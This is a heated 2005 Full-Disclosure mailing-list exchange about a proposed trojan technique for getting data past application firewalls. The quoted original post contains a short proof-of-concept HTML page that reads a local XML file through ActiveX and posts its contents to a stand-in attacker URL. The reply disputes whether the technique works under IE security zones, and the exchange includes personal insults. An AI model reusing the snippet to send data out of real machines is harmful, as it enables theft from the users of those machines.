RE: new attack technique? using JavaScript+XML+OWSPost Data

["Debasis Mohanty" <mail () hackingspirits com>]

Kid, 
Although I normally don't reply to such frivilous and lame statements but
your reply has seriously piss me off.. So dropping few lines, perhaps will
help you grow up !!

-----Original Message-----
> > From: Gaurav Kumar brazenly wrote:

> > Looks like u need to read again what i wrote. I didnt use the word
'spread'. 

I don't have to !! I can still remember your priceless statements [1] + [2]
- 

[1] A Trojan has been to be placed in a system running an application 
[1] firewall like Zone Alarm Pro etc.

[2] The target system must be having office XP and the user has to be 
[2] lured to view a webpage hosted by attacker.


ROFL !! May be you could just ask your l33t victim to send you his passwords
and other info by email :P Don't forget to send him your l33t email ID -
'@securebox.org'


> > [3] Moreover, u need not know if the target system is running ZA or
not...
> > [3] "the technique works even if firewall is not installed". 

> > [4] I am discussing a possible 'design' of a trojan here, "doesnt matter
is ZA 
> > [4] or any other FW is running on client".

Looking at statement [3] & [4], (especially the statement within double
quotes) just made me believe that you don't know what your are talking about
unless you want to look like an idiot. 


> > really? ever heard of IE exploits?

Priceless !! 


> > Well..Exactly! i would suggest u read the 'assumptions' first, its 
> > an assumption that user will click yes to warning...like most 'normal'
users do.

Yet another priceless statement... Maybe you could just ask your l33t victim
to click 'yes' to your l33t piece of code trying to download some l33t piece
of shit which will fail to run and die like an idiot. 


I am sure you have enough l33t skills to strick back to keep your ego
up2date however, I wud rather suggest if you have only your stupidity to
share then feel free to take it offline and don't piss off everyone in this
list. I would welcome you if you really want to strike back with some
_serious_ technical stuff. (Note: make a note of _serious_ in the statement)

- D




-----Original Message-----
From: gkverma () gmail com [mailto:gkverma () gmail com] On Behalf Of Gaurav Kumar
Sent: Thursday, December 22, 2005 8:52 AM
To: Debasis Mohanty
Cc: full-disclosure () lists grok org uk; websecurity () webappsec org
Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique?
using JavaScript+XML+OWSPost Data

On 12/22/05, Debasis Mohanty <mail () hackingspirits com> wrote:
> -----Original Message-----
> From: Gaurav Kumar
> Sent: Wednesday, December 21, 2005 8:59 PM
> To: full-disclosure () lists grok org uk
> Cc: websecurity () webappsec org
> Subject: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
>
> 1>> A Trojan has been to be placed in a system running an application 
> 1>> firewall like Zone Alarm Pro etc.
>
> > > Assumptions:
>
> 2>> The target system must be having office XP and the user has to be 
> 2>> lured to view a webpage hosted by attacker.
>
> 3>> The Trojan can be designed to generate an xml file which will 
> 3>> contain the data to be sent out. The attacker will lure
> the
> 3>> user to visit a website hosted by him.
>
> Lol !! In a practical scenario, the attacker who spreads the 
> worm/trojans himself is not aware in the initial stage which are the 
> infected machines unless the trojan sends back the machine/user info 
> back to the attacker. Now as you have already mentioned ZA is running 
> then no data can be sent back to the attacker. So the attacker is clueless
which are those infected machines.

Looks like u need to read again what i wrote. I didnt use the word 'spread'.
Moreover, u need not know if the target system is running ZA or not...the
technique works even if firewall is not installed. I am discussing a
possible 'design' of a trojan here, doesnt matter is ZA or any other FW is
running on client.

> So the case of luring the user to visit the link is out of scope...

really? ever heard of IE exploits?

> > > The site can have following HTML code-
>
> Now coming back to technical stuff, You are trying to access a local 
> file which will only be allowed if the site is in "Trusted Sites" or 
> "Local Intranet" or "Local Security Zone" and activex not marked safe. 
> The fact that *the client is also the server* is irrelevant.
>
> Try uploading the script to some webserver and give a html extention; 
> it will throw an _access denied_ error when the page loads (even on 
> Win XP + SP1).
>
> In case of any server side extention like *.asp, *.jsp etc, the user 
> will be prompted that an malicious component is trying to load and ask 
> for user permission.
>
>
> > > <html>
> > > <body>
> > > The author is not responsible for any misuse, this PoC is for 
> > > educational purpose only.
> > > <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > id="exp">
> > > </object>
> > > <script LANGUAGE=javascript>
> > > var xmlDoc
> > > xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > xmlDoc.async=false;
> > > xmlDoc.load("c:\\note.xml");
> > > xmlObj=xmlDoc.documentElement;
> > > var a= xmlObj.firstChild.text;
> > > exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > > </script>
> > > </body>
> > > </html>
>
>
> > > The above code (works well on windows XP SP2) essentials calls "OWS 
> > > Post Data" COM control to post the contents of note.xml (generated 
> > > by trojan) to attackersite.com
>
> IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone" 
> and draw conclusion about "Internet Security Zone".
>
> You may also link to know about this issue - 
> http://support.microsoft.com/kb/317244/EN-US/
>
>
> > > > Essentially, the technique is breaking the basic functionality of 
> > > > application firewalls by using OWS Post Data as bridge for sending 
> > > > out the data using Javascript and XML.
>
> Not Exactly !! I wud rather suggest you to do a little more research 
> and draw any conclusion. Keep those _Security Zones_ in mind before 
> you post anything...

Well..Exactly! i would suggest u read the 'assumptions' first, its an
assumption that user will click yes to warning...like most 'normal'
users do.
> - D


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/